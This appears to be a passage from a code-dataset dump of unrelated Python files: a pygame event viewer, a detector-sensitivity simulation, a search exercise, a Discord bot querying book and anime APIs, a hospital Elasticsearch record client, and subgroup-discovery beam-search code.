16);\nfont_height = font.get_linesize()\n\nprint(\"font_height: \", font_height)\nevent_text = []\n\nwhile True:\n event = pygame.event.wait()\n event_text.append(str(event))\n event_text = event_text[-SCREEN_SIZE[1]//font_height:]\n\n if event.type == QUIT:\n exit()\n\n screen.fill((255, 127, 0))\n\n y = SCREEN_SIZE[1]-font_height\n\n for text in reversed(event_text):\n screen.blit(font.render(text, True, (0, 0, 0)), (0, y))\n\n y-=font_height\n\n pygame.display.update()\n\n","sub_path":"PythonPygame/python_pygame_2.py","file_name":"python_pygame_2.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"60848400","text":"import numpy as np\nimport math,sys\n\nfrom detector import Detector, Component, define_detector\nfrom assay import Assay\nfrom facilities import HPGe\nimport toysens\n\nfrom ROOT import *\n\n# Units: \n# impurity: Bq/kg\n# mass: kg\n# livetime: s\n# rate: Hz\n\ndef main(ntoys, true_lambda, ncomp, spec_act, livetime, method, nsenstoys):\n\n # Define detector and its parts\n #comps = []\n #mass = 1 #per comp\n usetruth = (method == 'Truth')\n\n print('Arguments:')\n print('ntoys',ntoys)\n print('true_lambda',true_lambda)\n print('ncomp',ncomp)\n print('livetime',livetime)\n print('method',method)\n print('nsenstoys',nsenstoys)\n #print('mass',mass)\n\n det = define_detector(true_lambda, ncomp, spec_act, livetime)\n print('det',det)\n\n # Assay settings\n ge = HPGe(10./86400.)\n \n if usetruth:\n # True sensitivity -- Perfect knowledge of impurities\n ult_truth = det.truth()*livetime\n print('Ultimate true counts', ult_truth)\n for i in range(ntoys):\n true_sens, true_uls = toysens.calc_sens(det, method, livetime, nsenstoys, True)\n print('Sensitivity', true_sens)\n #print('Upperlimits', true_uls)\n #print('RMS', np.std(true_uls))\n #print_histo(true_uls)\n print\n \n else:\n # Sensitivity in real life -- Knowledge of impurities from imperfect assay\n for i in range(ntoys):\n \n # Assay campaign\n nlimits = 0\n for comp in det.components:\n comp.assay = Assay(ge.count(comp.trueimp,1,livetime=14*86400))\n if 'limit' in comp.assay.params.keys():\n nlimits += 1\n #print(det)\n \n sens, uls = toysens.calc_sens(det, method, livetime, nsenstoys, False)\n\n print('Sensitivity', sens, nlimits)\n #print('Upperlimits', uls)\n print\n\nif __name__ == '__main__':\n if len(sys.argv) < 8: \n print('See code for usage!')\n exit(0)\n\n ntoys = int(sys.argv[1])\n true_lambda = float(sys.argv[2])\n ncomp = int(sys.argv[3])\n spec_act = float(sys.argv[4])\n livetime = float(sys.argv[5])*86400*365\n method = sys.argv[6]\n nsenstoys = int(sys.argv[7])\n \n main(ntoys, true_lambda, ncomp, spec_act, livetime, method, nsenstoys)\n print('cache_size',len(toysens.fc_cache))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"402563507","text":"import time\r\nimport random\r\n\r\n# Adicionar as funções de Ordenamento e Pesquisa.\r\ndef semOrdenacao(lista):\r\n pass\r\n\r\ncompPesq= 0\r\ndef pesquisa_binaria(lista,item,E,D):\r\n compPesq= 0\r\n if (D 750:\n para = para[:750] + \"...\"\n date_ =\"\"\n if \"publishedDate\" in data[\"items\"][0][\"volumeInfo\"].keys(): \n date_ = data[\"items\"][0][\"volumeInfo\"][\"publishedDate\"]\n authorlst=[]\n if \"authors\" in data[\"items\"][0][\"volumeInfo\"].keys(): \n authorlst = data[\"items\"][0][\"volumeInfo\"][\"authors\"]\n author=\"\"\n for element in authorlst:\n author +=element + \", \"\n id_ = data[\"items\"][0][\"id\"]\n cover_image = \"https://www.messagetech.com/wp-content/themes/ml_mti/images/no-image.jpg\"\n if \"imageLinks\" in data[\"items\"][0][\"volumeInfo\"].keys():\n if \"thumbnail\" in data[\"items\"][0][\"volumeInfo\"][\"imageLinks\"].keys():\n cover_image = data[\"items\"][0][\"volumeInfo\"][\"imageLinks\"][\"thumbnail\"]\n url = \"http://books.google.com/books?id=\" + id_\n categorylst=[]\n if \"categories\" in data[\"items\"][0][\"volumeInfo\"].keys(): \n categorylst = data[\"items\"][0][\"volumeInfo\"][\"categories\"]\n categories=\"\"\n for element in categorylst:\n categories += element + \" \" \n content = \"\\n\" + para + \"\\n\\n\"\n stats = \"Author: \" + author + \"\\nPublishing Date: \" + date_ + \"\\nCategories: \" + categories\n embed = discord.Embed(\n title=title,\n url = url,\n description = content\n )\n embed.add_field(name=\"Information\", value = stats, inline = False)\n embed.set_thumbnail(url=cover_image)\n embed.set_footer(icon_url=auth.avatar.url, text=f\"Requested by {auth.name}\")\n return embed \n\ndef trace(q, author):\n api_url = \"https://api.trace.moe/search?url=\" + q\n response = requests.get(api_url)\n data_ = json.loads(response.text)\n if data_[\"error\"]:\n error = discord.Embed(\n title=\"Unable to trace\"\n )\n error.set_image(url = \"https://cdn.discordapp.com/attachments/637008973714817027/834462141267705976/remicry.gif\")\n return error\n id_ = data_[\"result\"][0][\"anilist\"]\n episode = str(data_[\"result\"][0][\"episode\"])\n temp = int(data_[\"result\"][0][\"from\"])\n stamp = time.strftime(\"%H:%M:%S\", time.gmtime(temp))\n content = \"Episode: \" + episode + \"\\nTimestamp: \" + stamp\n source_url = \"https://anilist.co/anime/\" + str(id_)\n query = '''\n query ($id: Int) { # Define which variables will be used in the query (id)\n Media (id: $id, type: ANIME) { # Insert our variables into the query arguments (search)\n title {\n romaji\n }\n coverImage{\n medium\n }\n\n }\n }\n '''\n variables = {\n 'id': id_\n }\n url = 'https://graphql.anilist.co'\n response = requests.post(url, json={'query': query, 'variables': variables})\n data = json.loads(response.text)\n title = data[\"data\"][\"Media\"][\"title\"][\"romaji\"]\n cover_image= data[\"data\"][\"Media\"][\"coverImage\"][\"medium\"]\n embed = discord.Embed(\n title=title,\n url=source_url,\n description = content,\n color = discord.Colour.red()\n )\n embed.set_thumbnail(url=cover_image)\n embed.set_footer(icon_url=author.avatar.url, text=f\"Requested by {author.name}\")\n return embed \n","sub_path":"others.py","file_name":"others.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"532880319","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*\n\n# 从ES服务器上获取数据信息\n\nimport os\nimport sys\ncur_path = os.path.abspath(os.path.dirname(__file__))\nroot_path = os.path.split(cur_path)[0]\nsys.path.append(root_path) # 项目路径添加到系统路径\nimport json\nimport time\nimport socket\nimport requests\nimport traceback\nfrom datetime import datetime\nfrom Utils.loadingConfigure import Properties\nfrom Utils.LogUtils import LogUtils\n\n\nclass GainESSearch(object):\n\n IS_INIT = False\n\n def __init__(self):\n if not GainESSearch.IS_INIT:\n self.parameters = Properties()\n self.logger = LogUtils().getLogger('es_search')\n self.log_info = \"\"\"hospital_code: [{0}], version: [{1}], serverip: [{2}], request_add: [{3}], request_data: [{4}],\n response_text: [{5}], response_code: [{6}], error_type: [{7}], error_content: [{8}], abnormal_info: [\\n{9}], take_times: [{10:.2f}]s\"\"\"\n es_host = self.parameters.properties.get('es_host')\n es_port = self.parameters.properties.get('es_port')\n self.hospital_code = self.parameters.properties.get('hospital_code')\n self.ver = self.parameters.properties.get('version')\n if es_port == '0':\n es_add = \"{}/search/bysy\".format(es_host)\n else:\n es_add = \"{}:{}\".format(es_host, es_port)\n self.id_add = 'http://{}/med/advanced/allVariableJilian.json'.format(es_add)\n self.record_add = 'http://{}/med/quality/getWenshuData.json'.format(es_add)\n self.record_list_add = 'http://{}/med/advanced/query/patients.json'.format(es_add)\n GainESSearch.IS_INIT = True\n\n def __new__(cls, *args, **kwargs):\n \"\"\"\n 单例模式\n \"\"\"\n if not hasattr(cls, 'instance'):\n cls.instance = super(GainESSearch, cls).__new__(cls)\n return cls.instance\n\n def _requestMethod(self, url, data, start_time, input_info):\n res = {'res_flag': False}\n r = requests.post(url, data=data, timeout=5)\n if r.status_code != 200:\n r = requests.post(url, data=data, timeout=5)\n try:\n result = r.json()\n time_cost = r.elapsed.total_seconds()\n except:\n HOST_NAME = socket.gethostname()\n HOST_IP = socket.gethostbyname(HOST_NAME)\n exc_type, exc_value, exc_traceback_obj = sys.exc_info() # sys.exc_info(),返回有关由except捕获的最近异常的信息\n abnormal_info = ''.join(traceback.format_tb(exc_traceback_obj))\n info = self.log_info.format(self.hospital_code, self.ver, HOST_IP, url, data, r.text, r.status_code,\n exc_type.__name__, exc_value, abnormal_info, time.time()-start_time)\n self.logger.error(info)\n res['error_source'] = 'es'\n res['input_data'] = input_info\n res['request_add'] = url\n res['response_status'] = r.status_code\n res['response_text'] = r.text\n res['error_type'] = exc_type.__name__\n res['error_info'] = '.'.join(exc_value.args)\n res['abnormal_info'] = ''.join(traceback.format_tb(exc_traceback_obj))\n return res\n res['res_flag'] = True\n res['response_time'] = time_cost\n res.update(result)\n return res\n\n def getId(self, expression):\n start_time = time.time()\n res = dict()\n res['result'] = set()\n res['res_flag'] = False\n data = {\n 'expressions': expression,\n \"page\": \"0\",\n \"size\": \"10\",\n \"result\": [[{\"exp\": \"等于\", \"field\": \"住院病案首页_就诊信息_就诊次数\", \"flag\": \"1\", \"unit\": \"\", \"values\": []}]]\n }\n r = requests.post(self.id_add, data=json.dumps(data))\n if r.status_code == 200:\n result = json.loads(r.text)\n time_cost = r.elapsed.total_seconds()\n else:\n r = requests.post(self.id_add, data=json.dumps(data))\n try:\n result = json.loads(r.text)\n time_cost = r.elapsed.total_seconds()\n except:\n HOST_NAME = socket.gethostname()\n HOST_IP = socket.gethostbyname(HOST_NAME)\n exc_type, exc_value, exc_traceback_obj = sys.exc_info()\n abnormal_info = ''.join(traceback.format_tb(exc_traceback_obj))\n info = self.log_info.format(self.hospital_code, self.ver, HOST_IP, self.id_add, data, r.text, r.status_code,\n exc_type.__name__, exc_value, abnormal_info, time.time()-start_time)\n self.logger.error(info)\n res['error_source'] = 'es'\n res['expression'] = expression\n res['response_status'] = r.status_code\n res['response_text'] = r.text\n res['error_type'] = exc_type.__name__\n res['error_info'] = '.'.join(exc_value.args)\n res['abnormal_info'] = ''.join(traceback.format_tb(exc_traceback_obj))\n return res\n if 'result' in result:\n res['res_flag'] = True\n res['response_time'] = time_cost\n if isinstance(result.get('result'), list):\n for one_batch in result['result']:\n keys = set(one_batch.keys())\n res['result'].update(keys)\n if 'Count' in result:\n count = int(result['Count'])\n if count != len(res['result']):\n res['count'] = len(res['result'])\n self.logger.warning('\\nCount: {}\\nlength: {}'.format(count, len(res), ))\n else:\n res['count'] = count\n else:\n res['error_info'] = 'No \"result\" in result...'\n\n if not res['res_flag']:\n res.update(result)\n res['error_source'] = 'es'\n res['expression'] = expression\n HOST_NAME = socket.gethostname()\n HOST_IP = socket.gethostbyname(HOST_NAME)\n info = self.log_info.format(self.hospital_code, self.ver, HOST_IP, self.record_add, data, r.text, r.status_code,\n 'res_flag is False', res, 'getId', time.time()-start_time)\n self.logger.warning(info)\n return res\n\n def getRecord(self, record_id, record_name, is_src=False):\n start_time = time.time()\n res = dict()\n res['res_flag'] = False\n data = {\n 'esId': record_id,\n 'wenshuName': record_name,\n 'isSrc': is_src\n }\n r = requests.post(self.record_add, data=data)\n if r.status_code == 200:\n result = json.loads(r.text)\n time_cost = r.elapsed.total_seconds()\n else:\n r = requests.post(self.record_add, data=data)\n try:\n result = json.loads(r.text)\n time_cost = r.elapsed.total_seconds()\n except:\n HOST_NAME = socket.gethostname()\n HOST_IP = socket.gethostbyname(HOST_NAME)\n exc_type, exc_value, exc_traceback_obj = sys.exc_info()\n abnormal_info = ''.join(traceback.format_tb(exc_traceback_obj))\n info = self.log_info.format(self.hospital_code, self.ver, HOST_IP, self.record_add, data, r.text, r.status_code,\n exc_type.__name__, exc_value, abnormal_info, time.time()-start_time)\n self.logger.error(info)\n res['error_source'] = 'es'\n res['record_id'] = record_id\n res['record_name'] = record_name\n res['response_status'] = r.status_code\n res['response_text'] = r.text\n res['error_type'] = exc_type.__name__\n res['error_info'] = '.'.join(exc_value.args)\n res['abnormal_info'] = ''.join(traceback.format_tb(exc_traceback_obj))\n return res\n if result.get(record_id):\n res = json.loads(result.get(record_id))\n res['res_flag'] = True\n res['response_time'] = time_cost\n if not res['res_flag']:\n res.update(result)\n res['error_source'] = 'es'\n res['record_id'] = record_id\n res['record_name'] = record_name\n HOST_NAME = socket.gethostname()\n HOST_IP = socket.gethostbyname(HOST_NAME)\n info = self.log_info.format(self.hospital_code, self.ver, HOST_IP, self.record_add, data, r.text, r.status_code,\n 'res_flag is False', res, 'getRecord', time.time()-start_time)\n self.logger.warning(info)\n return res\n\n def getRecordQuickly(self, patient_id, visit_id, record_name, record_type='2', is_src=False):\n \"\"\"\n 快速获取文书,type: 1表示门诊,2表示住院\n \"\"\"\n record_id = '{}##{}#{}#{}'.format(self.hospital_code, record_type, patient_id, visit_id)\n return self.getRecord(record_id, record_name, is_src)\n\n def getEsIdByDate(self, start_date='', end_date=''):\n \"\"\"\n 按患者出院起止时间, 获取患者es查询ID\n \"\"\"\n result = dict()\n result['result'] = list()\n expression = list()\n if start_date and not end_date:\n # 有起始日期,没有结束日期\n expression = [[{\"field\": \"住院病案首页_就诊信息_出院时间\", \"exp\": \">=\", \"flag\": \"or\", \"unit\": \"\", \"values\": [start_date]}]]\n if end_date and not start_date:\n # 有结束日期,没有起始日期\n expression = [[{\"field\": \"住院病案首页_就诊信息_出院时间\", \"exp\": \"<\", \"flag\": \"or\", \"unit\": \"\", \"values\": [end_date]}]]\n if start_date and end_date:\n # 有起始日期,也有结束日期\n expression = [[{\"field\": \"住院病案首页_就诊信息_出院时间\", \"exp\": \">=\", \"flag\": \"or\", \"unit\": \"\", \"values\": [start_date]}],\n [{\"field\": \"住院病案首页_就诊信息_出院时间\", \"exp\": \"<\", \"flag\": \"or\", \"unit\": \"\", \"values\": [end_date]}]]\n if not expression:\n return {'res_flag': False, 'info': 'No \"start_date\" or \"end_date\" in input para...'}\n es_result = self.getId(expression)\n if not es_result.get('res_flag'):\n return es_result\n result['res_flag'] = True\n result['result'] = list(es_result['result'])\n result['count'] = len(result['result'])\n return result\n\n def getPatientRecordList(self, patient_id, visit_id, record_type='2'):\n start_time = time.time()\n record_id = '{}##{}#{}#{}'.format(self.hospital_code, record_type, patient_id, visit_id)\n data = {\n 'expressions': [[{\"field\": \"fieldId\", \"exp\": \"=\", \"flag\": \"or\", \"unit\": \"\", \"values\": [record_id]}]],\n \"page\": \"0\",\n \"size\": \"10\",\n \"resultField\": [\"文档列表_文档名\"]\n }\n para = json.dumps(data)\n result = self._requestMethod(url=self.record_list_add, data=para, start_time=start_time, input_info=para)\n if not result.get('total'):\n result['res_flag'] = False\n return result\n if isinstance(result.get('hits'), list) and len(result.get('hits')) > 0:\n tmp = result['hits'][0]\n if isinstance(tmp, list) and len(tmp) > 0:\n res_tmp = tmp[0]\n if isinstance(res_tmp, dict) and isinstance(res_tmp.get('文档列表_文档名'), str):\n res_list = res_tmp.get('文档列表_文档名').split(',')\n result['result'] = res_list\n result.pop('hits')\n return result\n result['res_flag'] = False\n return result\n\n\nif __name__ == '__main__':\n app = GainESSearch()\n expression = [[{\"field\": \"住院病案首页_就诊信息_患者标识\", \"exp\": \"=\", \"flag\": \"or\", \"unit\": \"\", \"values\": [\"000052934000\"]}],\n [{\"field\": \"住院病案首页_就诊信息_就诊次数\", \"exp\": \"=\", \"flag\": \"or\", \"unit\": \"\", \"values\": [\"4\"]}]]\n # expression = [[{\"field\": \"住院病案首页_就诊信息_出院时间\", \"exp\": \">\", \"flag\": \"or\", \"unit\": \"\", \"values\": [\"2016-01-01\"]}]]\n t1 = datetime.now()\n # result = app.getId(expression)\n result = app.getPatientRecordList('000052934000', '4')\n # for i in result:\n # app.getRecord(i, 'binganshouye')\n # result = app.getRecord('BJDXDSYY##2#000665705900#1', 'yizhu')\n t = (datetime.now()-t1).total_seconds()\n print(json.dumps(result, ensure_ascii=False, indent=4))\n print('函数运行消耗 {0} 秒'.format(t))\n","sub_path":"Utils/gainESSearch.py","file_name":"gainESSearch.py","file_ext":"py","file_size_in_byte":12779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"521288","text":"import pandas as pd\nfrom itertools import combinations, chain\nfrom math import factorial\nfrom tqdm import tqdm\nimport numpy as np\nfrom heapq import heappush, heappop\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport random\nimport glob\nimport os\nimport pickle\nimport argparse\n# def readData():\n# features = pd.read_csv(\"data/features.csv\")\n# features = features.iloc[:,:-5]\n# clinicalData =pd.read_excel(\"data/ClinicalData.xlsx\")\n# features[\"outcome\"] = clinicalData[\"Cardiotoxicity\"]\n# features=features.set_index(\"index\")\n# return features\n\n\n# def readData():\n# header= list(range(1,101))\n# header2 = [str(x) for x in header]\n# features = pd.read_csv(\"data/X.csv\", header=None , names=header2)\n# outcome = pd.read_csv(\"data/Y.csv\", header=None, names=[\"outcome\"])\n# result = pd.concat([features, outcome], axis=1, sort=False)\n# # features = features.iloc[:,:-5]\n# # clinicalData =pd.read_excel(\"data/ClinicalData.xlsx\")\n# # features[\"outcome\"] = clinicalData[\"Cardiotoxicity\"]\n# # features=features.set_index(\"index\")\n# return result\n\n\n\n# def readData():\n# data_root= \"data3_toy\"\n\n# # header= list(range(0,100))\n# header= list(range(0,4))\n# header2 = [str(x) for x in header]\n# features = pd.read_csv(\"{}/X.csv\".format(data_root), header=None , names=header2)\n# outcome = pd.read_csv(\"{}/Y.csv\".format(data_root), header=None, names=[\"outcome\"])\n# result = pd.concat([features, outcome], axis=1, sort=False)\n\n# feat_score= pd.read_csv(\"{}/S1.csv\".format(data_root), header=None)\n# feat_similarity= pd.read_csv(\"{}/S2.csv\".format(data_root), header=None)\n# # feat_similarity = 1-feat_dissimilarity\n# feat_similarity = np.array(feat_similarity)\n# # features = features.iloc[:,:-5]\n# # clinicalData =pd.read_excel(\"data/ClinicalData.xlsx\")\n# # features[\"outcome\"] = clinicalData[\"Cardiotoxicity\"]\n# # features=features.set_index(\"index\")\n# X=result.iloc[:,:-1]\n# Y=result.iloc[:,-1:]\n# return [X, Y, feat_score, feat_similarity]\n\n\ndef getNumberOfFeatuers(data_root):\n features = pd.read_csv(\"{}/X.csv\".format(data_root), header=None)\n return features.shape[1]\n\ndef readData():\n print(\"reading data...\")\n data_root= \"sim_data_dec22/3\"\n features_num = getNumberOfFeatuers(data_root)\n # header= list(range(0,100))\n header= list(range(0,features_num))\n header2 = [str(x) for x in header]\n features = pd.read_csv(\"{}/X.csv\".format(data_root), header=None , names=header2)\n outcome = pd.read_csv(\"{}/Y.csv\".format(data_root), header=None, names=[\"outcome\"])\n result = pd.concat([features, outcome], axis=1, sort=False)\n\n feat_score= pd.read_csv(\"{}/V.csv\".format(data_root), header=None)\n feat_similarity= pd.read_csv(\"{}/W.csv\".format(data_root), header=None)\n # feat_similarity = 1-feat_dissimilarity\n feat_similarity = np.array(feat_similarity)\n # features = features.iloc[:,:-5]\n # clinicalData =pd.read_excel(\"data/ClinicalData.xlsx\")\n # features[\"outcome\"] = clinicalData[\"Cardiotoxicity\"]\n # features=features.set_index(\"index\")\n X=result.iloc[:,:-1]\n Y=result.iloc[:,-1:]\n return [X, Y, feat_score, feat_similarity]\n\n\n# def readTrueCases(path):\n \n# with open(path, \"r\") as f:\n# line = f.readline()\n# tokens = line.split(\",\")\n# selectors = []\n# for token in tokens:\n# sel = sgd.EquitySelector(\"814\",1)\n# soi = sgd.Conjuction([sgd.EquitySelector(\"814\",1)])\n\n\ndef readData_sim(path, return_true_causes=False):\n print(\"reading data...\")\n data_root= path\n features_num = getNumberOfFeatuers(data_root)\n # header= list(range(0,100))\n header= list(range(0,features_num))\n header2 = [str(x) for x in header]\n features = pd.read_csv(\"{}/X.csv\".format(data_root), header=None , names=header2)\n outcome = pd.read_csv(\"{}/Y.csv\".format(data_root), header=None, names=[\"outcome\"])\n result = pd.concat([features, outcome], axis=1, sort=False)\n\n feat_score= pd.read_csv(\"{}/V.csv\".format(data_root), header=None)\n feat_similarity= pd.read_csv(\"{}/W.csv\".format(data_root), header=None)\n # feat_similarity = 1-feat_dissimilarity\n feat_similarity = np.array(feat_similarity)\n # features = features.iloc[:,:-5]\n # clinicalData =pd.read_excel(\"data/ClinicalData.xlsx\")\n # features[\"outcome\"] = clinicalData[\"Cardiotoxicity\"]\n # features=features.set_index(\"index\")\n X=result.iloc[:,:-1]\n Y=result.iloc[:,-1:]\n\n if return_true_causes==True:\n print(\"11111111\")\n with open(\"{}/true_causes.csv\".format(path)) as f:\n true_causes= []\n for line in f:\n tokens = line.split(\",\")\n sels = []\n feature_ids_matlab = []\n for t in tokens:\n if not RepresentsInt(t):\n continue\n feature_ids_matlab.append(int(t.strip())) \n feature_ids_matlab = np.unique(feature_ids_matlab)\n for feature_id_matlab in feature_ids_matlab:\n sels.append(EquitySelector(str(feature_id_matlab-1),1))\n true_causes.append(Conjuction(sels))\n\n if return_true_causes==True:\n return [X, Y, feat_score, feat_similarity, true_causes]\n else: \n return [X, Y, feat_score, feat_similarity]\n\ndef RepresentsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\n\nclass EquitySelector():\n\n def __init__(self, attribute, value):\n self.attribute = attribute\n self.value = value\n\n def __eq__(self, other):\n return repr(self) == repr(other)\n\n def __hash__(self):\n return hash(repr(self))\n\n def covers(self, data):\n column_data = data[self.attribute].to_numpy()\n if pd.isnull(self.value):\n return pd.isnull(column_data)\n return column_data == self.value\n\n def __repr__(self):\n query=\"\"\n if np.isnan(self.value):\n query = self.attribute + \".isnull()\"\n else:\n query = str(self.attribute) + \"==\" + str(self.value)\n return query \n\n def __lt__(self, other):\n return repr(self) < repr(other)\n\n# class BinaryTarget():\n# def __init__(self, attribute, value):\n# self.attribute = attribute\n# self.value = value\n\ndef createTarget(attribute, value):\n selector = EquitySelector(attribute, value)\n return selector\n\n\ndef createSelectors(data, ignore=[]):\n selectors = []\n original_features = []\n sg_to_index = {}\n counter=0\n for attr_name in [x for x in data if x not in ignore]:\n for val in np.sort(pd.unique(data[attr_name])):\n selector = EquitySelector(attr_name, val)\n selectors.append(selector)\n original_features.append(int(attr_name))\n sg_to_index[selector] = counter\n counter=counter+1\n return [selectors, original_features, sg_to_index] \n\n\ndef createSearchSpace(selectors, depth):\n def binomial(x, y):\n try:\n binom = factorial(x) // factorial(y) // factorial(x - y)\n except ValueError:\n binom = 0\n return binom\n searchSpace = chain.from_iterable(combinations(selectors, r) for r in range(1, depth + 1))\n length = sum(binomial(len(selectors), k) for k in range(1, depth + 1))\n return [searchSpace, length]\n\n\nclass Conjuction:\n def __init__(self, selectors):\n self.selectors = selectors\n\n def __eq__(self, other):\n return repr(self) == repr(other)\n\n def __hash__(self):\n return hash(repr(self))\n\n def covers(self, data):\n # empty description ==> return a list of all '1's\n if not self.selectors:\n return np.full(len(data), True, dtype=bool)\n # non-empty description\n return np.all([sel.covers(data) for sel in self.selectors], axis=0)\n\n\n def __repr__(self, open_brackets=\"\", closing_brackets=\"\", and_term=\" AND \"):\n attrs = sorted(str(sel) for sel in self.selectors)\n return \"\".join((open_brackets, and_term.join(attrs), closing_brackets))\n\n def __lt__(self, other):\n return repr(self) < repr(other)\n\n\ndef add_if_required(result, sg, quality, result_set_size, check_for_duplicates=False): \n if check_for_duplicates and (quality, sg) in result:\n print(\"duplicated found\")\n return\n\n sg_set = convertSGtoSet(sg)\n for pair in result:\n beam_quality = pair[0]\n sg_beam = pair[1]\n sg_beam_set = convertSGtoSet(sg_beam)\n subtract = sg_beam_set - sg_set\n if len(subtract)==0 and quality < beam_quality:\n # print(\"Found a subset with better score! Not added\")\n return\n\n if len(result) < result_set_size:\n heappush(result, (quality, sg))\n elif quality > result[0][0]:\n heappop(result)\n heappush(result, (quality, sg))\n\ndef computeScore(sg_vector, outcome_vector, measure):\n n=len(sg_vector)\n sg_vector = sg_vector.astype(int)\n outcome_vector = outcome_vector.astype(int)\n tab = pd.crosstab(sg_vector,outcome_vector)\n \n if not 1 in tab.index: \n tab.loc[1]=0\n\n\n TP= n11 = tab.loc[1][1]\n FP= n10 = tab.loc[1][0]\n FN= n01 = tab.loc[0][1]\n TN= n00 = tab.loc[0][0]\n N= tab.loc[0][0]+tab.loc[0][1]\n P= tab.loc[1][0]+tab.loc[1][1]\n F= tab.loc[0][0]+tab.loc[1][0]\n T= tab.loc[0][1]+tab.loc[1][1]\n\n e=1\n if measure==\"accuracy\":\n quality = (n11+n00)/n\n elif measure==\"oddsRatio\":\n quality = (n00*n11)/(n10*n01)\n elif measure==\"colligation\":\n quality= ( n11*n00 - n10*n01 )/( n11*n00 + n10*n01 + e )\n elif measure==\"goodman\":\n quality = 1- ((min(n11,n10)+min(n00,n01))/(min(n01,n10)))\n elif measure==\"f1\":\n quality = (2*n11)/(n10+n01)\n elif measure == \"new\":\n quality = ((TP*TN)-(FP*FN))/(np.sqrt(T*F*P*N)+e)\n return quality\n\ndef computeQuality(X, Y, measure=\"\"):\n X = X.astype(int)\n Y = Y.astype(int)\n tab = pd.crosstab(X,Y)\n # print(tab)\n if not 1 in tab.index: \n tab.loc[1]=0\n if not 0 in tab.index: \n tab.loc[0]=0 \n\n tab = tab+1\n TP= n11 = tab.loc[1][1]\n FP= n10 = tab.loc[1][0]\n FN= n01 = tab.loc[0][1]\n TN= n00 = tab.loc[0][0]\n N= n0b=tab.loc[0][0]+tab.loc[0][1]\n P= n1b= tab.loc[1][0]+tab.loc[1][1]\n F= nb0= tab.loc[0][0]+tab.loc[1][0]\n T= nb1=tab.loc[0][1]+tab.loc[1][1]\n # print(\"{}*{} - {}*{}\".format(n11,n00,n10,n01))\n # print(\"{}*{} - {}*{}\".format(n1b,n0b,nb1,nb0))\n quality= ( n11*n00 - n10*n01 )/np.sqrt( n1b*n0b * nb1*nb0)\n return np.abs(quality)\n\n\ndef simpleSearch(target, selectors, data, measure):\n searchSpace = createSearchSpace(selectors,2)\n # print (searchSpace[1])\n # searchSpace = searchSpace[0]\n # print(type(searchSpace))\n tqdm_searchSpace = tqdm(searchSpace[0],total=searchSpace[1])\n result = []\n for i, selectors_one_point in enumerate(tqdm_searchSpace):\n sg = Conjuction(selectors_one_point)\n sg_vector = sg.covers(data)\n outcome_vector = target.covers(data)\n quality = computeScore(sg_vector, outcome_vector, measure)\n # result.append((quality,selectors_one_point))\n add_if_required(result, sg, quality, 10)\n return result\n\n\ndef beamSearch(target, selectors, data, measure, max_depth=2, beam_width=5, result_set_size=5):\n beam = [(0, Conjuction([]))]\n last_beam = None\n\n depth = 0\n while beam != last_beam and depth < max_depth:\n last_beam = beam.copy()\n print(\"last_beam size: {}, depth: {}\".format(len(last_beam), depth))\n for (_, last_sg) in last_beam:\n if not getattr(last_sg, 'visited', False):\n setattr(last_sg, 'visited', True)\n for sel in tqdm(selectors):\n # create a clone\n new_selectors = list(last_sg.selectors)\n if sel not in new_selectors:\n new_selectors.append(sel)\n sg = Conjuction(new_selectors)\n sg_vector = sg.covers(data)\n outcome_vector = target.covers (data)\n quality = computeScore(sg_vector, outcome_vector, measure)\n add_if_required(beam, sg, quality, beam_width, check_for_duplicates=True)\n depth += 1\n\n result = beam[:result_set_size]\n result.sort(key=lambda x: x[0], reverse=True)\n return result\n\n\n\n\n\ndef main():\n data=readData()\n target=createTarget(\"outcome\",True)\n selectors = createSelectors(data,[\"outcome\"])\n with open(\"result.txt\",\"w\") as f:\n for measure in [\"accuracy\", \"oddsRatio\", \"colligation\", \"goodman\", \"f1\"]:\n f.write(measure)\n f.write(\"\\n\")\n result = simpleSearch(target, selectors, data, measure)\n for r in result:\n f.write(\"\\t\"+str(r))\n f.write(\"\\n\")\n f.write(\"\\n\")\n print(\"end finished\")\n return result\n\n\ndef main_beam():\n data=readData()\n target=createTarget(\"outcome\",True)\n selectors = createSelectors(data,[\"outcome\"])\n with open(\"result_beam.txt\",\"w\") as f:\n for measure in [\"colligation\"]:\n f.write(measure)\n f.write(\"\\n\")\n result = beamSearch(target, selectors, data, measure)\n for r in result:\n f.write(\"\\t\"+str(r))\n f.write(\"\\n\")\n f.write(\"\\n\")\n print(\"end finished\")\n return result\n\n\ndef pruneFeatures(X, Y, feat_score, ignore, threshold):\n to_be_pruned = []\n for attr_name in [x for x in X if x not in ignore]:\n if feat_score[int(attr_name)].item()0:\n computed_scores_count = computed_scores_count+1\n print (\"computed scores count: {}\".format(computed_scores_count))\n \n\n\ndef createNewWeightMatrix(selectors, original_features, W):\n print(\"create new weight matrix...\")\n new_W= np.zeros((len(selectors),len(selectors)))\n for i in tqdm(range(len(new_W))):\n for j in range(len(new_W)):\n new_W[i,j] = W[original_features[i], original_features[j]] \n return new_W\n\ndef initializeVisitedMatrix(last_beam, selectors, sg_to_beamIndex, sg_to_index):\n visited= np.zeros((len(last_beam),len(selectors))) \n for beam_key in sg_to_beamIndex:\n beam_key_set = convertSGtoSet(beam_key)\n for sel in beam_key_set:\n visited[sg_to_beamIndex[beam_key], sg_to_index[sel]] = 1\n return visited\n\ndef create_sg_to_beamIndex(last_beam):\n sg_to_beamIndex ={}\n for i, (i_score, last_sg) in enumerate(last_beam):\n sg_to_beamIndex[last_sg] = i\n return sg_to_beamIndex\n\n\ndef findPair(i, F, new_W, visited, last_sg, sg_to_beamIndex):\n j_prime = np.argmax(F[i,:])\n weights_vector=new_W[:, j_prime]\n weights_vector = weights_vector * (1-visited[sg_to_beamIndex[last_sg]]) \n j = np.argmax(weights_vector)\n return [j, j_prime]\n\ndef findPair_adaptive(i, F, new_W, visited, last_sg, 